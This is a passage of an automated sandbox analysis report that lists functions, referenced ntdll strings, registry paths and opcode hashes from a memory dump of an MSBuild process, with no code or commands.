UseFilter, xrefs: 0107A1C1

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: fc86af84c85e8586beb8cc9a18335f7a7da49d1a4ef9bd1248b79559d2953a92
Instruction ID: 6a833ef558fd94124f904367213ef3d920eceafcb7bf87f6e61da8895abe3392
Opcode Fuzzy Hash: fc86af84c85e8586beb8cc9a18335f7a7da49d1a4ef9bd1248b79559d2953a92
Instruction Fuzzy Hash: A4A179719012299BEB319F68CD88BEEB7B8FF44710F0041EAE949A7250DB359E85CF54

Function 01107410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON

Download Yara Rule

Strings

VirtualAlloc, xrefs: 011075FC
Objects>%4u, xrefs: 011075D5
Objects=%4u, xrefs: 011075EA

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: Objects=%4u$Objects>%4u$VirtualAlloc
API String ID: 0-3870751728
Opcode ID: b1e514e776b99ef4d8cc9e2422af50874218633b4118a1aeea66533da4031ae6
Instruction ID: b0bb2445c97fb8b00c6cb3272d1b567dfecc188306ef4557926d1fd0ea24cd7e
Opcode Fuzzy Hash: b1e514e776b99ef4d8cc9e2422af50874218633b4118a1aeea66533da4031ae6
Instruction Fuzzy Hash: 64913DB0E006159FEB19CF69C880BADBBB1BF48314F14C169E945AB3D1E7B5A842CF54

Function 0108B440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON

Download Yara Rule

Strings

LdrpResGetResourceDirectory Exit, xrefs: 0108B477
{, xrefs: 010E37B6
LdrpResGetResourceDirectory Enter, xrefs: 0108B465

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
API String ID: 0-373624363
Opcode ID: 1042f4b5b5d35d2b50fd88ce30d15378cc20571a1dc323f436ac3b4de8cdce79
Instruction ID: c65d27b46449a6f857005d2d9d3ea9eb7c0b8aec21ae123828c03a77fa3d66bb
Opcode Fuzzy Hash: 1042f4b5b5d35d2b50fd88ce30d15378cc20571a1dc323f436ac3b4de8cdce79
Instruction Fuzzy Hash: 4491BD71A0821ACFEB21DF59C554BAEBBF0FF05318F144195E9D1AB290D7789A81CBA0

Function 010B909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

%, xrefs: 010F5D3F
@, xrefs: 010B9148
&, xrefs: 010F5CF8

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: %$&$@
API String ID: 0-1537733988
Opcode ID: 7fdd23d21dcebd485759c80cf6bde0bbf108921fed5a28fd504420637c39cd46
Instruction ID: f83b8dc6721c93335128fa5b006b0f8a16ed2583fa21757ac499a23a2f88b3c0
Opcode Fuzzy Hash: 7fdd23d21dcebd485759c80cf6bde0bbf108921fed5a28fd504420637c39cd46
Instruction Fuzzy Hash: D371BEB09093069FD714DF28C9C0AAFBBE5BF8461CF108A5DE6EA47691C730D905CB92

Function 0107758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON

Download Yara Rule

Strings

Invalid address specified to %s( %p, %p ), xrefs: 010DAFCB
HEAP: , xrefs: 010DAFB8
HEAP[%wZ]: , xrefs: 010DAFAB

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 0-1151232445
Opcode ID: 389f4f7627e580be72ef362297046400271019c2410b89470dca0e5486c7bfa5
Instruction ID: cca89b507ed3f641119b84df4c10198a19cb78083a8affd75e9627b70dfa9cf8
Opcode Fuzzy Hash: 389f4f7627e580be72ef362297046400271019c2410b89470dca0e5486c7bfa5
Instruction Fuzzy Hash: 4C4109B0B00380CFEF79CAADC4887B97BE19F05384F1884E9D5C68B69AD678D885C755

Function 0113C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0113C1C5
@, xrefs: 0113C1F1
PreferredUILanguages, xrefs: 0113C212

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 90e2f6a4307ee013a1dd707466bb1975ee66a7051cb8fbeb0c3dcd0206907a59
Instruction ID: 7ed3cff642500e619548674884fa71a64e6513ad317ceadd8e0c3c71d58677c0
Opcode Fuzzy Hash: 90e2f6a4307ee013a1dd707466bb1975ee66a7051cb8fbeb0c3dcd0206907a59
Instruction Fuzzy Hash: CE416372E00219EBDF15DBD8C851FEEBBB9AB94700F14406BEA49F7244D7749A448B90

Function 01114144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

@, xrefs: 01114225
LdrpResValidateFilePath Exit, xrefs: 01114172
LdrpResValidateFilePath Enter, xrefs: 01114160

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: ebbb40359bf29711be333766f4dea87bbee75a7005b5ce3c62413f68cf489cde
Instruction ID: 2311db793bfb4142fe3cb5bb7f6940a0ad1542722bcd070725b8b640904ac47a
Opcode Fuzzy Hash: ebbb40359bf29711be333766f4dea87bbee75a7005b5ce3c62413f68cf489cde
Instruction Fuzzy Hash: 9D4126319002588BEB29DBE8D850BEDFBB4FF55B40F240469D941EFB85D7349941CB51

Function 010B33A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context data, xrefs: 010F29FE
Actx , xrefs: 010B33AC
RtlCreateActivationContext, xrefs: 010F29F9

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
API String ID: 0-859632880
Opcode ID: c500aec88a13d910490fd123c2407b0fa1605aef0580041c59348d4fcd41373b
Instruction ID: 5dce3b71c68514201bae275c19c87ee4619e94dc6219c67f2e5659d609157448
Opcode Fuzzy Hash: c500aec88a13d910490fd123c2407b0fa1605aef0580041c59348d4fcd41373b
Instruction Fuzzy Hash: 7D312432600306DFEB26DE58C8C1BDB7BA4FB44710F2544A9EE449F281DB74E845CB90

Function 0110B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON

Download Yara Rule

Strings

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0110B632
GlobalFlag, xrefs: 0110B68F
@, xrefs: 0110B670

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
API String ID: 0-4192008846
Opcode ID: a6c3802dbc48c10204ffc82b03a80c8795a42d05e5556d6be16d1ac2a2f8ef03
Instruction ID: b0c9b1649c08a679497566c9cfdaea57878b91034f45155959a9d6d841848ece
Opcode Fuzzy Hash: a6c3802dbc48c10204ffc82b03a80c8795a42d05e5556d6be16d1ac2a2f8ef03
Instruction Fuzzy Hash: 10314DB5E0020AAFDB15EFA5CC80AEFBB7CEF44744F140469E605A7190D7749E40CBA8

Function 010C1270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON

Download Yara Rule

Strings

\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 010C127B
BuildLabEx, xrefs: 010C130F
@, xrefs: 010C12A5

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 0-3051831665
Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction ID: 6100a7f401405c84a1a960f4b495f4daf7f9172c1c0e9d058ec8d4ee37f9b37f
Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction Fuzzy Hash: AC31A17290061DEFDB12AF95CC44EDEBFBDEB94B14F004029FA54A7660D7319A059F90

Function 011020DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

LdrpInitializationFailure, xrefs: 011020FA
minkernel\ntdll\ldrinit.c, xrefs: 01102104
Process initialization failed with status 0x%08lx, xrefs: 011020F3

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: e36516ee08f0e93e3462f62f6c20fd64ebdeb10beaaaaef3e5fa10fd53afad53
Instruction ID: 08756b3918a5597afdabc437cc503ef25d3d892972a185f0d81ff81a5bf24c9c
Opcode Fuzzy Hash: e36516ee08f0e93e3462f62f6c20fd64ebdeb10beaaaaef3e5fa10fd53afad53
Instruction Fuzzy Hash: A8F0C235A40308AFE729E64CCC46F9A777DFB80B54F54006DFA90BB6C5D2F0A940CA91

Function 010903E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 010E4D8A

Strings

#%u, xrefs: 010E4D82

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 958b5510094534fff56b8512c4aaabf2781f3c64e542fb803819e1e05017b94d
Instruction ID: 9afe3e0313d30227efcf1a6d89d14c72217b6644e03342c6ed4cb346093a38a0
Opcode Fuzzy Hash: 958b5510094534fff56b8512c4aaabf2781f3c64e542fb803819e1e05017b94d
Instruction Fuzzy Hash: E57159B1A0014A9FDF05DFA9C994BAEB7F8BF08744F144069E945EB251EB34ED41CBA0

Function 010952A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 01095445
@, xrefs: 010955A3

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: f50c0fcdce8ce503238fd0f8c0aa6c41e58b6740d8c0d21b34630b492c71837a
Instruction ID: 29c96a46f065a1e8a536f8acc242a30f1cb6a74f3545820fbd5d23e44a1f88c4
Opcode Fuzzy Hash: f50c0fcdce8ce503238fd0f8c0aa6c41e58b6740d8c0d21b34630b492c71837a
Instruction Fuzzy Hash: 6032CE705083118FDB658F1AD8A477EBBE1EF88704F14895EFAC59B290E735D840EB92

Function 0114A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 0114A44B
`, xrefs: 0114A551

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: bc5b0cb449afaf569bdd199b49ecc3c1cbf71806bf0d39f183e9430fafe03e4d
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 91C1E4312443429BEB29CF28D841B6BBBE5BFC4B18F094A2DF696CB290D775D505CB81

Function 0108A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 0108A2FB
RtlpResUltimateFallbackInfo Exit, xrefs: 0108A309

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 239f871bf3d5ebd001c2b92a3381d16e26e4c2a8816039eda13fce633c9cf5e8
Instruction ID: 5c60fda5514f1f03659857959585de44759f838d0f1d09ede119d43bf19e4609
Opcode Fuzzy Hash: 239f871bf3d5ebd001c2b92a3381d16e26e4c2a8816039eda13fce633c9cf5e8
Instruction Fuzzy Hash: 0341AC31B08659DFDB21AF69C844BAE7BF4BF84300F1480AAE9C0DB691E2B5D940CB40

Function 011135BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Exit, xrefs: 011135FE
LdrResGetRCConfig Enter, xrefs: 011135EC

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
API String ID: 0-118005554
Opcode ID: 2950eedc4b8ca41ca524ca083f04dd6fe2162ef652880b7539430cc6e6aa901e
Instruction ID: 12904ec63f2a4767058d698c9d61d0b3bc6cfe2dce95f6793618de49e70e3657
Opcode Fuzzy Hash: 2950eedc4b8ca41ca524ca083f04dd6fe2162ef652880b7539430cc6e6aa901e
Instruction Fuzzy Hash: FA31C3312197429FE319DF28D854B5AB7E4FF84724F050869F9A4CB398EB30DA05CB92

Function 010B329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

@, xrefs: 010B330D
.Local\, xrefs: 010B32B5

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: 44a6ee1503ad7f64968c6fb3c7fc8bd72a1cff464b1e7a6fe056ec669421c326
Instruction ID: ecba78d0fe8e29cafcbca9cbf828a576344b7e63f6373884314c9c0cdc43ecfc
Opcode Fuzzy Hash: 44a6ee1503ad7f64968c6fb3c7fc8bd72a1cff464b1e7a6fe056ec669421c326
Instruction Fuzzy Hash: 3E31AFB2109705AFC311DF28C8C0A9FBBE8FB94A54F54492EF9D58B310DA30DD048B92

Function 010BA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 010BA5E4
Threadpool!, xrefs: 010BA5E9

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: ff5709d9f493348a3d62d1648f0400a579a0a27149da18a802ce68fd3c6871c9
Instruction ID: c237710e2e26f6dd59c5c8fc83f61aa2f66f377bb4a4022d248b3efc49236d11
Opcode Fuzzy Hash: ff5709d9f493348a3d62d1648f0400a579a0a27149da18a802ce68fd3c6871c9
Instruction Fuzzy Hash: 7701D1B2240700EFE311DF14CD85B967BF8E798B15F008939B698CB290E734E904CB46

Function 0112A118 Relevance: 1.8, Strings: 1, Instructions: 591COMMON

Download Yara Rule

Strings

@, xrefs: 0112A68B

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8f0698a05c7df5ae706be8a9c1517482bb8000bbf4f80356fa1e980acedae0fd
Instruction ID: 5d43f6d2f9e1749ecf888a252d6bc951c05c7a71db93dc559a835a6a34b5bb91
Opcode Fuzzy Hash: 8f0698a05c7df5ae706be8a9c1517482bb8000bbf4f80356fa1e980acedae0fd
Instruction Fuzzy Hash: 4122E5702046B18FEB2DCF2DE054372BBF1AF45300F198459DA968FA86E335E462DB65

Function 01087370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a818c232ea97b997773250437b40a7218541ed2d82ae149432dfb322696aee7
Instruction ID: 0dbd7f7c3a10117234387ced5260e24a0984ee488ff261e727d21160a126f535
Opcode Fuzzy Hash: 4a818c232ea97b997773250437b40a7218541ed2d82ae149432dfb322696aee7
Instruction Fuzzy Hash: B7A18A71608742CFC365EF28C480A2ABBF5BF98304F24496EE5D58B355EB70E945CB92

Function 01106420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 011065C1

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 47721bcb584c947bc8d59c3e297826bde5dc30d4382bf3538a3d3c4d23a671fc
Instruction ID: 0f25d0f52534f3dfeec7b4321bbd343796366669cc3fe534351857419f0cbae2
Opcode Fuzzy Hash: 47721bcb584c947bc8d59c3e297826bde5dc30d4382bf3538a3d3c4d23a671fc
Instruction Fuzzy Hash: 42915072900219AFEB26DB95CD85FEEBBB8EF18B50F504065F600AB190D775AD10CBA4

Function 0113B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 0113B28F

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: PreferredUILanguages
API String ID: 0-1884656846
Opcode ID: 0a5015f63662e41b069be65269c5d4b19f6bf921f881a7bb7c227170459606f8
Instruction ID: 6538d2fd2586b23fa16212bb83fd37c28dbe98f7735fbcca654caaedf6f7f503
Opcode Fuzzy Hash: 0a5015f63662e41b069be65269c5d4b19f6bf921f881a7bb7c227170459606f8
Instruction Fuzzy Hash: 5641B576D08229ABDB19DA99C840BEEB7B9EF84710F054126ED41F7254E734DE40C7A4

Function 0112705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

kLsE, xrefs: 011270A4

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: kLsE
API String ID: 0-3058123920
Opcode ID: f1ea0f22d4089582dd72a23a8610e3b212710eb4b5375b21dc797b223a332d1e
Instruction ID: 4fb9e3456f0d4ab592a23f481cb818dd7d5da951b85c35bd88ff0bbb432bc11a
Opcode Fuzzy Hash: f1ea0f22d4089582dd72a23a8610e3b212710eb4b5375b21dc797b223a332d1e
Instruction Fuzzy Hash: F5417C315047628BF73DAB68E844BAA3FB1AB51B28F24013DEDB08A2C5CB7404D5C7A0

Function 010B7505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

#, xrefs: 010F4622

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction ID: 3408eb02e17637b40f02886c1c3d493e016ab60a7e71fc3dc6838abbf4d4d326
Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction Fuzzy Hash: CA41B275A0065AEBCF25DF48C490BFEB7B5FF84701F00409AEA81A7280DB70D941CBA2

Function 01085096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 010850BF

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 952b19ada5935d1ca0ab76f902016ddb096d57bf550ddfc0436b38bb10fa59a4
Instruction ID: 8f4af71b6ae79c0fa272559c9caf0ff57474a52316ab3c7d287fe13a2f50cc92
Opcode Fuzzy Hash: 952b19ada5935d1ca0ab76f902016ddb096d57bf550ddfc0436b38bb10fa59a4
Instruction Fuzzy Hash: 0E11E23070C6028BEFB4690D8C5167ABBD5FB81224F34856AF5E2CF391DA71DC428B81

Function 0110106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

LdrCreateEnclave, xrefs: 011010F7

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID: LdrCreateEnclave
API String ID: 0-3262589265
Opcode ID: 8718bd4f983ed5ec12ff2b8d929fdb4767fc99382ec5623bfdbdc60e61535d7f
Instruction ID: 6d5091f445bb3a0956cef61c364243a0135e4beeafedc82625c84500558fb8f4
Opcode Fuzzy Hash: 8718bd4f983ed5ec12ff2b8d929fdb4767fc99382ec5623bfdbdc60e61535d7f
Instruction Fuzzy Hash: D621F5B19183449FC325DF2AC844A9BFBF8BBD5B50F004A1EB9A496350D7B4D445CB92

Function 010D739A Relevance: .7, Instructions: 705COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b71388a2eec60e291e9aff1d20ab10e11b74dd2b7e74a1eb916089a236426b4c
Instruction ID: 858f9573ca7bef5481da19a53852687148c6a43ed53f8aef52c79017f7fc1392
Opcode Fuzzy Hash: b71388a2eec60e291e9aff1d20ab10e11b74dd2b7e74a1eb916089a236426b4c
Instruction Fuzzy Hash: 14428F71A007169FDB19CF5DC490AAEBBF2FF88318B14859DD596AB341DB34E842CB90

Function 010AB2C0 Relevance: .6, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a256777c123281d32cf8b6d3a9ce08456eaba258ea535d843a66284848157d6
Instruction ID: ee2285fa2b5eaa8e13415b1f1bd4ecdd702b0a97f162b933b9238d0f91d58185
Opcode Fuzzy Hash: 6a256777c123281d32cf8b6d3a9ce08456eaba258ea535d843a66284848157d6
Instruction Fuzzy Hash: 1932AE72E00219DFDB24CFA8C894BEEBBB1FF54714F584169E885AB381E7359941CB90

Function 01118158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6107b9a364142a31e135a968ae70749ada1bb048db41056817b0aa8f66b0e0ac
Instruction ID: 334c04a325211b78a9fd23af0cb9979a37f0557fee8c11f4492a05d76a7fb693
Opcode Fuzzy Hash: 6107b9a364142a31e135a968ae70749ada1bb048db41056817b0aa8f66b0e0ac
Instruction Fuzzy Hash: F0423C75E102198FEB29CF69C881BEDFBB5BF48300F19C1A9E949AB245D7349981CF50

Function 010865D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 704ccd919d06be14c6f96927b21b55f7e5df5f964f48ab9499299df8590b110b
Instruction ID: db3bb7ae27942513bf2b374e6d9e9fd4e4eee5956142b88f24b8f0bcebc916e4
Opcode Fuzzy Hash: 704ccd919d06be14c6f96927b21b55f7e5df5f964f48ab9499299df8590b110b
Instruction Fuzzy Hash: C1E18071508342CFC715EF28C490A6ABBE1FF89314F0689ADE5D987351EB32E945CB92

Function 01078397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca22217f7d3f87ed92676c1c034c0757d6580b89fc118c6873cb6012356b2879
Instruction ID: 4d84cd9ed7390bfcbdddc1385c4cdd22e395f53074dab07fe89bb02377bd7533
Opcode Fuzzy Hash: ca22217f7d3f87ed92676c1c034c0757d6580b89fc118c6873cb6012356b2879
Instruction Fuzzy Hash: 7AD1F571A003069BDB14DF28C884BBEB7F5BF58304F05856EE996DB280EB34E954CB54

Function 01108243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: 9586e6fdef0c0b2ea838aa107c4c58dd329cf18d12eb5a1132bb928431380de1
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction Fuzzy Hash: CFB18374E046059FDF2ADF99C940AABBBB5BF84304F14442DAA429B7D1DBB4E905CB10

Function 0109F460 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
